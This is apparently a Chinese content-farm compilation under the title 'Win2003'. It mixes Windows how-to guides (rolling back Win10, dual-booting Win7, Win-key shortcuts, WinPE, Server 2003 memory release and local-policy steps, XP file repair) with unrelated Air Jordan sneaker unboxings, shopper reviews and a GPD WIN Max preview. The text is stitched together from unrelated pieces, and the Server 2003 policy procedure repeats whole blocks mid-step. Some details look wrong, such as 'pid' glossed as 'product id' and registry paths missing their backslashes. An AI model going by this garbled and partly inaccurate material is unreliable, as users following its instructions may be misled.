Win2003（汇总20篇）

有用户使用了win10一段时间后,发现并不太习惯使用Win10，尤其是对Win10的操作界面不是很喜欢, 这时想还原到之前的Win7系统,但是不知道怎么还原?下面就来教大家如何将win10怎么还原成win7?

win10怎么还原成win7?

1、点击右下角任务栏的图标。

2、在弹出的页面中，点击所有设置选项。

3、在设置中选择更新和安全。

4、在更新与安全中选择恢复选项。

5、找到会退到win7选项，点击开始。

6、会弹出一个页面问你为啥回退到win7，选择你的原因，点击确定。

7、接下来的界面需要你填写以前的用户名和密码，点击下一步。

8、点击回退到win7操作系统，过几分钟的时间系统就会回退到升级以前的系统。

win10怎么还原成win7?以上就是还原的详细步骤，有兴趣的朋友可以参考本文，希望能对大家有所帮助!

win8下怎么安装Win7

如今新购买的不管是台式电脑还是笔记本多数默认已经安装Win8系统，对于很多朋友来说，其实Win7都还没有完全上手，毕竟Win7才流行不久。那么对于还想使用Win7的朋友该怎么办呢?最好的解决办法是安装双系统了，也就是在电脑中同时安装Win7与Win8操作系统，可能很多菜鸟朋友来说，安装系统太难了，不会怎么办?下面告诉大家一种非常简单的系统安装方法，在Win8系统下安装Win7就像在电脑中安装软件一样，相信每个菜鸟都可以学会Win8下怎么安装Win7双系统。

之前安装系统对于很多童鞋来说，可能都会觉得比较难，因为不管是在XP还是Win7系统，一般采用的是光盘或者制作U盘系统安装系统，安装过程中会涉及比较繁琐的设置，并且还会遇到一些英文界面，令不少菜鸟朋友忘了却步。不过大家别忘了Win8系统已经开始支持ISO光盘镜像文件，也就是说，可以直接在Win8电脑中下载Win7镜像文件，可以直接打开安装，因此Win8下安装Win7其实就像是在电脑中安装软件一样简单，因此对于每个朋友来说，Win8安装双系统就特别简单了，废话不多说，下面一起来看看Win8下怎么安装Win7吧。

第一步：在Win8电脑中下载Win7镜像文件

首先只需要到网上下载Win7系统镜像ISO文件，可以下载的地方很多，大家可以百度搜索下，直接在百度搜索“Win7系统下载”大家可以找到很多网站都可以免费下载Win7镜像文件。

第二步：直接双击Win7镜像文件，找到运行文件

如上图，下载好了Win7镜像文件后，由于Win8自带有虚拟光驱功能，可以直接打开镜像文件，因为需要直接双击打开IOS镜像文件，之后即可进入IOS文件夹，在里面找到运行文件"Setup"，直接点击运行即可，如下图：

第三步：Win8下像安装软件一样安装Win7

双击Setup运行文件即可开始安装Win7系统了，和安装普通软件一样，一步步按照提示安装即可，首先进入的第一步的安装。在安装第一步的选项时，记得选择第二项，选择“不获取最新安装”，选择此项安装回更简单快捷，如果选择第一项会下载一些更新文件，会比较慢，并且需要联网状态进行，一般不建议选择。还是为了简单快捷，直接选择第二项吧，如下图：

之后点击下一步，下面安装选择就简单了，首先点击“我接受许可条款”再点下一步，这些和普通软件安装都差不多了，如下图：

再下一步，则建议大家选择“自定义安装”，如下图：

再到下面就到了选择将Win7安装在哪个盘了，最好选择一些可用空间较大的盘，这里选择也没什么讲究，也不一定要新盘，但为了以后资料查找，建议大家还是选择一个里面没有放文件，并且具有一定剩余空间(至少大于10G)的盘符。另外如果你不想要Win8系统了，可以直接将此Win7安装到Win8盘符进行覆盖，那样最后就只剩下win7了，一般不建议这样操作，安装双系统其实更好使用，具体大家自己决定。

选择好安装盘符后，再下一步就是系统正式安装了，等待Windows7安装完成即可，安装完成后，系统会自动重启，直到完成，自动安装完WIN7系统后，会自动重启，重启后正常进入Win7的安装步骤，我们只需要一路点击下一步，即可完成Win7的安装，如果没有覆盖原来Win8，那么在Win7下面还可以访问Win8系统盘文件，比如Win8下的桌面，在Win7中也可以调用，到此Win8下安装Win7系统就结束了，电脑就已经成功有两个系统了。

接下来还可以设置一个默认系统，也就是开机到底进默认哪个呢?可以进入系统的引导设置，方法是，不管是在刚才进入的Win7系统里，按Win+R组合键，打开运行对话框，然后在运行对话的文本框里输入" msconfig "，然后按回车键(或点击确定)即可进入系统配置了，然后切换到“引导”菜单下，选择一下引导系统的顺序即可，排在第一的就为默认启动的系统，设置完了，别忘了点击底部的确定哦，如下图：

在Win8下安装Win7后，电脑开机启动菜单变为非WINDOWS UI的老样式，这一引导有两大好处，WIN8崩溃之后也不影响进入WIN7;同时选择进入WIN7也不用重启。而如果是先装WIN7再装WIN8的话，在WINDOWS UI下如果要选择WIN7则需要重启，WIN8如果崩溃之后则进不了任何系统，需要重装，如下图，我们要进入非默认系统，则可以在开机的时候，按电脑键盘的上下键选择即可。

由于Win8支持直接打开镜像文件，因此安装系统，并不要之前Win7或者Win XP系统那样借助虚拟光驱软件或者将镜像文件写入U盘制作启动项，只需要向安装软件一样安装Win7，对于菜鸟朋友来说，Win8下安装系统将变得异常简单，人人都可以上手了，如果大家即喜欢Win8又喜欢Win7那么安装双系统是最佳选择，并且双系统，也不必担心系统奔溃等问题。

就像手机等设备具有快捷键一样，大多键盘上都有一个画着windows大旗的小按键，这个不太起眼的小东西，可能很多人都非常少摸到它，殊不知它其中隐藏着各种小秘密，而win7系统也正因为有了它而更加方便易用。它就是win键——键盘中的“隐”君子，工作中的好助手。让我们先来看一下Win键在窗口控制中的几个快捷应用吧。

Win+Home快速清理活动窗口

平常工作中，我们总是为活动窗口太多而烦恼，但是一个个关闭又费时又费力，win7系统便提供了Win+Home的快捷方式，将所有使用中窗口以外的窗口最小化。瞬间达到完美效果，你瞧现在只有正在使用的窗口显示在桌面上了，神奇吧。

Shift+Win+上方向键快速垂直最大化窗口

这是个比较实用的快捷设置，我们工作忙的时候，或者不仅要与别人聊天还要一边进行文章处理的时候都需要这项功能，它可以快速实现正在工作中的窗口快速垂直最大化而且不改变原窗口的水平宽度，这样就能节省出很大一部分屏幕用来进行其他的工作。相信这会是许多需要进行多窗口操作的朋友最爱的技巧。

另外，还有包括Win+左/右方向键快速将窗口靠到屏幕的左右两侧、Shift+Win+左/右方向键快速将窗口移到左、右屏幕(如果你有接双屏幕的话)、Win+Space：将所有桌面上的窗口透明化、Win+上方向键将使用中的窗口最大化等快捷方式，在这就不一一列举了。

还有在工作列表中的相关快捷方式。举例如下：

Win+1~9快速开启软件

如果你的快速启动栏中有与1-9相对应的软件或程序，而你由懒于动鼠标，那么利用win键加对应数字就能轻松开启工作列上相对应的软件，从左到右依顺序为 Win+1 到 Win+9。

Shift+Win+1~9快速开启新「分身」

对应位置软件的一个新「分身」，例如像 firefox 的话会是打开新窗口，切换各个活动列表的最佳快捷方式，这可是非常实用的哟。还有Ctrl+Win+1~9，这个快捷键是在对应位置软件已开的分身中进行切换，与上面这个快捷方式有类似的地方。

然后我们来看一下Win键在其它方面的方便快捷性。

Win+P 快速切换投影模式

Win7系统为电脑外接投影仪提供了一个非常有用的快捷键“Win+P”，可以轻松切换投影模式：按住“Win”键，再多次按下“P”键，就可以在四种显示模式中自由切换。无论是开会做简报还是讨论方案，都非常快捷方便。

另外还有Win+ (+/-)快速放大和缩小、Win+G实现快速在 Gadget 间切换等实用功能，期待大家自己去发现并熟练掌握。

Win键作为win7中独有的快捷方式成为大家所青睐的快捷助手，它不仅提高了工作的效率，而且让许多工作减少了不必要的麻烦，可谓“有你更添精彩”一点儿也不错的。快去尝试一下吧!

AirPods不仅可以连接iPhone与MAC，还可以连接windows电脑，而连接电脑我们可以进行这样的操作。

1、打开电脑右下角蓝牙，右键点击蓝牙进入电脑蓝牙设置。

2、将AirPods放进耳机盒中，打开盒盖，长按后面设置按钮知道耳机盒显示白色灯光闪烁。

3、在“蓝牙和其他设备”设置窗口中，打开蓝牙开关，然后单击“添加蓝牙或其他设备”。

4、在添加设备窗口，选择“蓝牙”，在窗口中选择您的AirPods设备，最后点击连接按钮进行配对。

5、在“蓝牙和其他设备”设置窗口的设置中，选择声音设置，在声音对话框中将蓝牙设备作为输出设备。

百度如何免费升级win10

正式版Win10将于7月29日正式发布并提供给用户免费下载安装。Win10发布后，用户在百度搜索Win10相关的关键词，就可以获得全面准确的Win10资讯，同时可一键进入微软Win10官方版下载页面，便可获取Win10安装程序。那么百度免费升级Win10是怎么回事呢?

百度的相关负责人表示，通过百度搜索获得的官方升级入口，可以确保Win10升级安装包，给予用户最大的自主选择权，这在此前是根本不能想象的。不过，百度并没有提供软件类升级Windows 10的服务，只是单纯的提供了一个搜索入口而已。但即便如此，对微软推广Windows 10的作用也是巨大的。

作为国内最大的搜索引擎，百度每天要响应超过60亿次的搜索请求，可以直接对接Win10的官方升级渠道。不同于需要捆绑升级的定制版本，百度将给Win10带来更高价值的流量回报。因此，在临近新系统正式发布的最后时刻，微软把百度拉了进来，宣布后者成为其在中国的Win10升级战略合作伙伴。目前，百度已经在搜索服务中提供正版Win10的更新和下载渠道，当用户在百度搜索Win10的关键词时，会直接弹出升级页面。

相比于这一合作方式，百度可能取代Bing，成为中国市场上Win10默认搜索引擎的消息则显得十分不可思议。据接近百度和微软的消息人士透露，微软将在近期宣布相关消息，并从今年11月开始将Windows系统的默认搜索引擎更新为百度搜索。也就是说，今后Win10用户在用浏览器进行地址栏搜索，或使用其他原生搜索功能时，得到的结果可能都将来自百度，而非微软自己的必应搜索。

电脑组装知识网小编分享winpe是什么意思?Win PE有什么功能?windows PE再次成为热词，是因为windows XP的停止服务，很多人都会选择在虚构机上运行windows XP。这时候，windows PE就会被用到了。下面小编为大家来详细解答。

一、Win PE是什么意思?

Win PE是简化版的Windows 或 Windows Server，一般寄生于直接激活的CD或DVD光盘，Windows PE是简化版的Windows 或 Windows Server，放在一片可直接激活的CD或DVD光盘，特点是激活时出现 Windows 的图形界面(GUI)。Win PE最初是用来方便企业制造自定义的Windows系统。但现在，被广泛用于装系统、备份/还原系统、甚至修复Windows受损组件等等。

二、Win PE有什么功能?

目前，据官方统计Win PE已经推出多个版本，比如：Win XP的WinPE 2.x、 Vista、Win7的WinPE 3.x、Win8的WinPE 4.0、Win8.1的WinPE 5.0、Win8.1 Update的WinPE 5.1。除了Win8.1 PE 5.1是一款专用于新电脑Windows安装和服务的最小操作系统，其他的版本都有多种功能。

1、安装Windows系统前对磁盘分区

2、可以用于安装Windows

3、捕获和设置Windows映像

4、修复Windows的异常反应

5、恢复电脑数据

6、新增个性化扩展应用

7、可以使用GUI功能

8、操作WinPE命令行

总结：虽然WinPE有这么多的功能，但是它并不是万能的。Windows PE是在默认占用512MB内存中读写，电脑重启后数据将会被清除，所以，一般仅用于应急、部署安装系统或者还原系统。

相关知识：WinPE中无法访问移动硬盘的处理方法、

以上是电脑组装知识网小编分享的Win PE是什么意思、Win PE有什么功能、通过小编的分享现在大家知道Win PE都有哪些功能了吧、想学习更多电脑知识的朋友、多多关注电脑组装知识网、

有时在按“Ctrl”或“Alt”组合键的时候会误触开始菜单键，导致出现“win”组合键的操作，实际上“win”组合键可以自由禁用的。

1.首先打开“开始菜单”，输入“注册表编辑器”并按回车键，打开注册表编辑器；

2.定位到以下路径“HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced”；

3.在右侧的窗格中新建字符串值；

4.，命名为“DisabledHotkeys”，双击打开，在数值数据中输入想要禁用的“win+[某个字母键]”，可以输入多个字母来表示禁用这所有的与“win”的组合键，例如输入了“ASD”则禁用了“win+A”、“win+S”、“win+D”这三个组合键；

5.重新登录系统后即可使设置生效。

airjordan11winlike82是AJ会在双十一当天带来的全新配色，这款很像大魔王配色的AJ11设计的还是很有特色的，款式非常好看。下面本网小编给大家讲讲airjordan11winlike82配色实物开箱怎么样？

AJ11海军蓝实物开箱

相信很多人都在期待着这双airjordan11winlike82的实物图，等着双十一收入囊中，我们一起来看看吧。拥有着全新配色的AirJordan11“WinLike82”，实物真的很帅!小编提前拿到了这双AirJordan11“WinLike82”，先来一波开箱图，稍后还会为大家带来上脚穿搭敬请期待!

AirJordan11“WinLike82”采用亮眼的海军蓝漆皮搭配白色尼龙鞋面，后跟点缀北卡蓝色JumpmanLogo，最后以淡蓝色水晶底收尾!

该配色以1982年MichaelJordan帮助北卡大学队取得关键胜利赢得最终冠军为主题，展现了巨星之路的开端为灵感来源，整体效果与超人气AirJordan11“Concord”极为相近，泛着淡淡蓝色给人一种熟悉但却耳目一新的视觉感受!中国区将在11月11日早9点正式发售，定价¥1599RMB。

AJ品牌介绍

空中飞人(AirJordan)是耐克旗下以史上最著名的NBA球星迈克尔·乔丹(MichaelJordan)命名的系列。1985年，迈克尔·乔丹(MichaelJordan)以高薪合约被当时还是小厂家的体育用品生产商耐克(Nike)签约至旗下，耐克(Nike)更随即为乔丹推出了第一款以乔丹命名的球鞋，即空中飞人(AirJordan)系列的第一款。虽然这款球鞋在当时具备奇特的配色以及新奇的科技，但是谁都不曾想到，这居然会是一个神话的开始。AIRJORDAN外底使用坚实的牵引力和出色的柔性。凹槽模仿人类脚的自然运动而设计。JordanBrand的汤姆Luedecke解释说：“它的纬向工程实际相匹配的足迹。我们正在寻找一个脚印发现鞋的磨损最初发生地方，适量的牵引模式”。乔丹品牌开发的专有编织技术和标准碳纤维并不会有什么不同，但它的大小和形状是有不同的。

AJ鞋子怎么样

我开始了解aj应该是我高三的时候，到大学的时候想买aj的心早就蠢蠢欲动了，但当时aj还是饥饿营销，需要抽号才能得到，而且一双1000块对于一个月生活费2000的我确实有点高，所以只能羡慕别人穿。后来上班了能买的起了，但是又没有好看的颜色，对于颜控来说，我只喜欢aj4和5还有13，这次七夕和男票去世贸天阶吃饭，说到去这个亚洲最大aj围观，正好试到了这双鞋，穿38竟然合适，卖鞋的小姐姐说aj就要买大半码，男票看我喜欢就掏腰包把我买下了。

aj里面最喜欢的就是aj11和aj4了，颜值高而且不磨脚!真的不磨脚!穿高帮鞋子最怕磨脚后跟，出去要是逛个街吃个饭回来脚后跟基本不是水泡而是血迹斑斑。aj4鞋底软踩屎感十足哈哈哈哈，鞋子的包裹性特别好，长期穿高跟鞋的女孩偶尔可以试试aj4，给自己的脚放个假。

鞋子非常好看!很完美没有瑕疵!客服非常热情!正不正品我不知道!但是真的很霸气!感谢客服。

外观绝对可以，就是怎么上手感觉表面的皮质有点硬，不像是皮的。没有想象的柔软。生硬你们买的是不是这种感觉问问大家?

穿着很好，很喜欢aj，在这家买了三双，还有一双没拍～店家服务态度也很好!好看，发朋友圈都会说，现在美女都喜欢穿球鞋了吗，哈哈哈，美死了!喜欢喜欢，不要克制，贵的总是好的!正品aj爱死了，以后继续来买。

近日，GPD官方宣布即将推出新款GPDwinmax便携笔记本，那么GPD WIN Max怎么样?GPD WIN Max值得买吗?下面来看详细内容吧!

GPD WIN Max怎么样：

GPD Win Max机型显示器预计会增加到8~9英寸，分辨率1280×800.采用主动式散热设计。

GPD WIN Max怎么样GPD WIN Max值得买吗

GPD Win Max尺寸扩大使得键盘变得更易于输入，采用QWERTY全键盘设计，对WASD位置进行修正，更符合标准键盘布局。

同时，GPD在Win Max键盘上方保留了游戏控件，右摇杆和功能键回归GPD WIN布局，中间夹着一块小巧的矩形触摸板。

GPD WIN Max值得买吗：

GPD WIN Max将搭载i7-1065G7处理器，采用16GB内存和512GB SSD。鲁大师CPU跑分为82180.核显跑分为33426.

GPD WIN Max怎么样GPD WIN Max值得买吗

GPD WIN Max预计将于不久后发布。

xp和win7都是微软公司研发的电脑操作系统，那么大家知道怎么把xp系统换成win7系统吗？接下来这篇指南将告诉你答案。

操作方法

把xp系统换成win7系统其实就是一个重装系统的过程，在重装系统之前我们需要准备一个U盘启动盘，其实就是普通U盘，不过里面有win7的镜像文件。

然后我们将XP系统的电脑开机，然后立马按下F8或者F12进入BIOS模式，然后将启动模式设置为“Flash Disk”也就是U盘启动。

然后将U盘插入电脑，重新将电脑开机，这时候电脑就会进入pe模式，我们点击之前准备的win7镜像文件，开始安装win7系统。

我们选择只重装系统盘，也就是C盘，这样可以保证我们其它文件不被覆盖，然后等待二十几分钟，win7系统就安装完成了。

联想拯救者系列型号笔记本出厂自带win8系统，有些想安装成win7系统的朋友不知道怎么重装。这边用u盘装系统的方法教大家联想拯救者 win8改win7 ，有需要的朋友可以参考看看。

1、首先制作一个u启动u盘启动盘，然后将win7镜像存放在u盘中。接着进行bios设置win8改win7，可以参考文章“ 联想win8改win7bios设置方法 ”。设置好之后将u盘插入电脑中重启电脑，设置u盘启动并进入u启动主菜单中，选择运行win8pe选项回车。如图：

2、接着检查分区表格式是否为mbr格式，如果不是则将分区表格式转换成mbr格式，可以使用傲梅分区助手工具转换。如图：

3、然后在弹出的u启动pe装机工具中选择win7镜像安装在c盘中，点击确定按钮，如图：

4、弹出程序将执行还原操作窗口，勾选完成后重启，直接点击确定即可。如图：

5、最后就是程序的安装过程，静静等待安装完毕即可，如图：

对于用u盘装系统装机已经是老方法了，联想拯救者win8改win7操作过程也为大家分享到这边，如果想更彻底得了解就自己动手安装试试哦。

airjordan11winlike82配色最近被UNC球员们上脚了，在球场上吸引了不少粉丝的目光，非常好看。下面本网小编给大家讲讲airjordan11winlike82配色什么时候发售？airjordan11winlike82配色上脚效果怎么样？

AJ11最新配色

airjordan11winlike82配色终于公开了发售信息，这双鞋子设计的简直太好看了，大家在双十一当天去抢吧！

这款AirJordan11“WinLike82”昨晚在北美通过SNKRS意外提前少量发售，除此之外，鞋款将在11月11日正式发售。UNC球员们为庆祝全国冠军的旗帜亮相也在昨天晚上的比赛中提前上脚了该款球鞋，以及全新设计的JustDonxAirJordan球裤也一同亮相。

AJ品牌介绍

空中飞人(AirJordan)是耐克旗下以史上最著名的NBA球星迈克尔·乔丹(MichaelJordan)命名的系列。1985年，迈克尔·乔丹(MichaelJordan)以高薪合约被当时还是小厂家的体育用品生产商耐克(Nike)签约至旗下，耐克(Nike)更随即为乔丹推出了第一款以乔丹命名的球鞋，即空中飞人(AirJordan)系列的第一款。虽然这款球鞋在当时具备奇特的配色以及新奇的科技，但是谁都不曾想到，这居然会是一个神话的开始。AIRJORDAN外底使用坚实的牵引力和出色的柔性。凹槽模仿人类脚的自然运动而设计。JordanBrand的汤姆Luedecke解释说：“它的纬向工程实际相匹配的足迹。我们正在寻找一个脚印发现鞋的磨损最初发生地方，适量的牵引模式”。乔丹品牌开发的专有编织技术和标准碳纤维并不会有什么不同，但它的大小和形状是有不同的。

AJ11怎么样

收到了小红书的礼物，竟然是12月10日发售的AirJordan11SpaceJam。SpaceJam大灌篮20周年，最经典的大灌篮配色!造型上一如既往的帅气!准备搭配短裤和卫衣穿，想想都有些激动!这两天一直在下雨，等雨停了我一定要去室外尽情玩耍去拍大片给你们看!嘿嘿。

上次发售aj11已经是两年前的事儿了!今年6月入手了一双11的低帮版，跑了很多地儿才买到大魔王配色，确实比北卡蓝好看太多，黑色的真是超帅超酷!低帮设计比较方便脱穿，漆皮鞋头干净利落!鞋子很有纪念意义。

第一双aj11是老公先斩后奏买的，起初并没有特别喜欢。有一次逛街看见儿童款的，于是老公心里就长草了，过了几天非得让我去问价格。因为还在孕期宝宝也没有出生，怕买了宝宝也没机会穿，结果我就没买。又一次逛街，我和老公又去看，结果终于给他拔草把这童鞋给收了。结账时导购说第二天来成人女款，但是37～40码的，38号的只有一双还是她们店里白金会员预定的。我也就没上心，过了几天去店里看试了37的有点挤，店员说有38的就是别人预订的，但是给那个会员打了两次电话都没接她们就认为自动放弃了，正巧赶上我能穿着合适，于是就毫不犹豫的收了这双鞋。也许这就是缘分!期待我们一家三口穿上这鞋的样子，暂时先收起来，等宝宝能穿了我们一起穿。

穿起来的感觉就是帅，正品，烽火的忠实粉，以后买鞋认准烽火。

烽火的鞋，不用多讲。这款11，是太空大灌篮版，所以绣的号码不是23。穿上它可以给好多鞋盲普及一下球鞋知识哈哈。

如何在win2003中安全的释放内存

经常看到有朋友在论坛上诉苦说需要释放内存，其实如果你安装了Windows 2003的话，那么并不需要寻求那些需要注册才能长久使用的第三方内存管理软件。因为Windows 2003已经自带了一个名为Empty.exe的小程序，它可以用来释放某些应用程序在占用大量内存时不能及时释放的那部分资源，与那些第三方软件内存管理软件不同的是， Empty.exe不会强迫系统全部释放资源，而是仅仅释放必要的资源，这样就不会加重硬盘的负担了。

Empty.exe的使用相当简单，命令格式如下：

Empty.exe pid（pid指进程的product id）

或者是Empty.exe task-name（task-name指进程的名称）

最后需要说明的是，Empty.exe仅仅能在Windows Server 2003中使用，Windows 2000/XP中就无缘使用了。

设置win2003的本地策略应用

概要

本文介绍了如何在工作组设置中基于Windows Server 2003 的计算机上将本地策略应用于除管理员以外的所有用户。

在工作组设置（而非域）中使用基于Windows Server 2003 的计算机时，可能需要在该计算机上实施本地策略，这些策略可应用于该计算机的所有用户，但不可应用于管理员。有了这一例外，管理员可以保留对计算机的无限制访问权和控制权，并且还可以限制可登录该计算机的用户。

将本地策略应用于除管理员以外的所有用户

要对除管理员以外的所有用户实施本地策略，请执行以下步骤：

以管理员身份登录到计算机。

打开本地安全策略。要实现这一点，请执行以下操作：

单击开始运行，键入gpedit.msc，然后按ENTER 键。

或者单击开始运行，键入mmc，按ENTER键，添加“组策略对象编辑器”，然后为本地安全策略对其进行配置。

如果删除运行命令是您所需要的策略之一，Microsoft 建议您通过“Microsoft 管理控制台”(MMC) 编辑该策略，然后将结果保存为图标。这样，您不需要使用运行命令就可以重新打开该策略了。

展开用户配置对象，然后展开管理模板对象。 概要

本文介绍了如何在工作组设置中基于Windows Server 2003 的计算机上将本地策略应用于除管理员以外的所有用户。

在工作组设置（而非域）中使用基于Windows Server 2003 的计算机时，可能需要在该计算机上实施本地策略，这些策略可应用于该计算机的所有用户，但不可应用于管理员。有了这一例外，管理员可以保留对计算机的无限制访问权和控制权，并且还可以限制可登录该计算机的用户。

将本地策略应用于除管理员以外的所有用户

要对除管理员以外的所有用户实施本地策略，请执行以下步骤：

以管理员身份登录到计算机。

打开本地安全策略。要实现这一点，请执行以下操作：

单击开始运行，键入gpedit.msc，然后按ENTER 键。

或者单击开始运行，键入mmc，按ENTER键，添加“组策略对象编辑器”，然后为本地安全策略对其进行配置。

如果删除运行命令是您所需要的策略之一，Microsoft 建议您通过“Microsoft 管理控制台”(MMC) 编辑该策略，然后将结果保存为图标。这样，您不需要使用运行命令就可以重新打开该策略了。

展开用户配置对象，然后展开管理模板对象。

概要

本文介绍了如何在工作组设置中基于Windows Server 2003 的计算机上将本地策略应用于除管理员以外的所有用户。

在工作组设置（而非域）中使用基于Windows Server 2003 的计算机时，可能需要在该计算机上实施本地策略，这些策略可应用于该计算机的所有用户，但不可应用于管理员。有了这一例外，管理员可以保留对计算机的无限制访问权和控制权，并且还可以限制可登录该计算机的用户。

将本地策略应用于除管理员以外的所有用户

要对除管理员以外的所有用户实施本地策略，请执行以下步骤：

以管理员身份登录到计算机。

打开本地安全策略。要实现这一点，请执行以下操作：

单击开始运行，键入gpedit.msc，然后按ENTER 键。

或者单击开始运行，键入mmc，按ENTER键，添加“组策略对象编辑器”，然后为本地安全策略对其进行配置。

如果删除运行命令是您所需要的策略之一，Microsoft 建议您通过“Microsoft 管理控制台”(MMC) 编辑该策略，然后将结果保存为图标。这样，您不需要使用运行命令就可以重新打开该策略了。

展开用户配置对象，然后展开管理模板对象。

启用您所需的任何策略（例如，“隐藏桌面上的‘网上邻居’”或“隐藏桌面上的Internet Explorer 图标”）。

备注：一定要选择正确的策略，否则，您可能会限制管理员登录计算机（以及完成配置计算机所需步骤）的能力。Microsoft 建议您记录所做的任何更改。

关闭“Gpedit.msc 组策略”管理单元，或者，如果您使用 MMC，请将控制台保存为图标，以便以后可以访问它，然后从计算机注销。

以管理员身份登录到计算机。

您可以在此登录会话中验证以前所做的策略更改，因为在默认情况下，本地策略会应用于包括管理员在内的所有用户。

从计算机注销，然后以此计算机所有其他用户（您希望他们应用这些策略）的身份登录到计算机。这些策略是为所有这些用户和管理员而实现的。

备注：对于在这一步未登录到计算机的任何用户帐户，都无法为其实现这些策略。

以管理员身份登录到计算机。

单击开始，指向控制面板，然后单击文件夹选项。选择查看选项卡，选中“显示隐藏文件或文件夹”，然后点确定以便可以查看“组策略”隐藏文件夹。或者，打开“Windows 资源管理器”，单击工具，然后单击文件夹选项以查看这些设置。

将位于 %Systemroot%System32GroupPolicyUser 文件夹中的 Registry.pol 文件复制到备份位置（例如，复制到另一硬盘、软盘或文件夹）。

使用“Gpedit.msc 组策略”管理单元或您的 MMC 图标再次打开本地策略，然后启用在为该计算机创建的原始策略中禁用的实际功能。

备注：执行此操作时，“策略编辑器”会创建一个新的 Registry.pol 文件。

关闭策略编辑器，然后将创建的备份 Registry.pol 文件复制回%Systemroot%System32GroupPolicyUser 文件夹中。

系统提示替换现有文件时，单击是。

从计算机注销，然后以管理员身份登录。

将本地策略应用于除管理员以外的所有用户

要对除管理员以外的所有用户实施本地策略，请执行以下步骤：

以管理员身份登录到计算机。

打开本地安全策略。要实现这一点，请执行以下操作：

单击开始运行，键入gpedit.msc，然后按ENTER 键。

或者单击开始运行，键入mmc，按ENTER键，添加“组策略对象编辑器”，然后为本地安全策略对其进行配置。

如果删除运行命令是您所需要的策略之一，Microsoft 建议您通过“Microsoft 管理控制台”(MMC) 编辑该策略，然后将结果保存为图标。这样，您不需要使用运行命令就可以重新打开该策略了。

展开用户配置对象，然后展开管理模板对象。

由于您是以管理员身份登录到计算机，您可以验证是否没有实施最初所做的更改。从计算机注销，然后以其他用户身份登录。

由于您是以用户（而非管理员）身份登录到计算机，您可以验证是否实施了最初所做的更改。

以管理员身份登录计算机，以确认本地策略不影响您以本地管理员身份登录该计算机。

恢复原始本地策略

要撤消本文中“将本地策略应用于除管理员以外的所有用户”一节介绍的过程，请执行以下步骤：

以管理员身份登录到计算机。

单击开始，指向控制面板，然后单击文件夹选项。单击查看 选项卡，单击“显示隐藏文件和文件夹”，然后单击确定 以便可以查看“组策略”隐藏文件夹。或者，打开“Windows 资源管理器”，单击工具，然后单击文件夹选项。

从 %Systemroot%System32GroupPolicyUser 文件夹中移动、重命名或删除Registry.pol 文件。

在您从计算机注销或重新启动计算机后，“Windows 文件保护”系统会创建另一个默认的 Registry.pol 文件。

打开本地策略。要实现这一点，请单击开始运行，然后键入gpedit.msc。或者，单击开始运行，键入mmc，加载本地安全策略。然后，将设为禁用或启用的所有项目设为未配置，以撤消 Registry.pol 文件所指定的对 Windows Server2003 注册表实施的任何策略更改。

以管理员身份从计算机注销，然后再次以管理员身份登录该计算机。

从计算机注销，然后以本地计算机的所有用户身份登录到该计算机，这样也可以针对它们的帐户撤消更改。

今天小编分享电脑专业知识、说说winXP系统下修复被损坏文件的方法、在使用电脑的过程中是否经常会遇到电脑文件损坏的问题呢?有时是因为误删了一部分文件，在清理电脑时以为是没有用的文件，却被我们删除了，这样就会导致文件丢失的现象，或者是因为外界的因素，病毒的侵入等等，这些原因都会造成部分系统文件丢失的问题，这样会影响系统的正常运行，让我们在日常的使用中受到影响。下面小编来教大家修复WindowsXP系统中部分被损坏的文件方法、

修复方法：

1、先要在系统的安装磁盘中找到我们所被破坏的文件，直接在搜索中输入文件名字后面的字符为"_"

2、这里给大家举个例子比如说“Notepad.exe”，然后就写成“Notepad.ex_”进行搜索文件。

3、搜索到文件了以后，在打开开始菜单找到命令选项打开，输入命令比如说EXPAND D:SETUPNOTEPAD.EX_ C:WindowsNOTEPAD.EXE;路径为命令操作。

4、还有一种情况就是搜索不到想要找的文件，那么该怎么办呢，就需要在CAB中进行查找，其实系统会把CAB作为一个文件夹，在把这个文件拖到相对应的磁盘目录下就可以了。

这样的方法的确对部分被损坏的文件奏效，但是不是对所有的文件都有效的，所以遇到这样的问题的话要选择合适的方法，但不能一直依赖哦、

以上是小编分享的电脑专业知识、Win XP系统下修复被损坏文件的方法、大家学会了吗、希望小编分享的知识对大家有所帮助、

如何安装win10?

windows10已经推出了，并且安装没有门槛。但也有不少网友发现了很多问题，那么，我们安装时有哪些注意事项呢?

下面，我们就来看看windows 10安装指南分享。

1. 需要一定电脑操作经验

微软仅仅提供了ISO文件，并且提醒用户，如果没有太多电脑操作经验，可能很难安装和上手。另外，还存在Bug和崩溃现象，所以不要将其作为主力的操作系统使用。

2. 做好安装前的准备工作

安装之前，你需要做一些准备工作，比如备份数据。另外如果你原本的操作系统并非是Windows 8.1，最好在微软兼容中心检测一下兼容性。

3. 需要注册Windows Insider Program

下载技术预览版之前，你还需要加入Windows Insider Program，也就是预览体验计划，这里需要你同意一些使用条款，并使用Windows账户登录。

4. ISO文件大小约4GB

微软提供了英语、中文简体、葡萄牙语等语言版本，其中中文32位系统为3.05GB、64位则 为3.96GB，请预留好这部分存储空间。另外，微软还为企业用户提供了技术预览版的Enterprise版本。下载之后，使用ISO应用将其制作为启动 光盘或U盘，就可以开始安装了。另外，其使用期限截止为2015年4月15日。

5. 可以选择升级安装

安装方式有两种，一种在原有系统中点击EXE文件进行升级安装，系统会保留你的个人数据、应用程序等，不过建议Windows 8/8.1用户采用这种方式，因为笔者在升级Windows 7时遇到了错误。如果遇到错误，可以格式化启动盘进行全新安装。

6. 对硬件要求不高

微软官方对Windows 10技术预览版的最低硬件要求为：1GHz及以上处理器、1GB(32位)或2GB(64位)RAM、至少16GB的硬盘可用空间，所以老PC也能够轻松升级。另外，系统不能运行在RT及Windows N设备上。

7. 仅支持笔记本和PC

该预览版是专为笔记本及PC推出，所以并未集成混合设计、平板的专属界面和触摸优化功能。

8. 需要重新安装语言包

如果你原本的系统安装了语言扩展包，那么在升级技术预览版时会被删除，你需要重新下载。

9. 不能使用系统还原恢复原有系统

如果你之前备份了Windows 8的系统还原数据，无法在技术预览版中直接使用，只能重新安装系统。

10. 使用虚拟机可能是最好的体验方法

显然，使用虚拟机是最佳的体验方式，可以在不影响原有系统的情况下体验技术预览版，类似软件有很多，如VirtualBox等，可直接调用ISO文件进行安装。

不 同于Windows 8的消费者预览版，Windows 10技术预览版是通过新的“Windows Insider”项目发布的，它会要求用户提供反馈，甚至是提供了私人论坛来和微软的工程师进行讨论。如果你是普通用户，那么下面这些内容或许可以帮你轻 松安装Windows 10。

准备工作

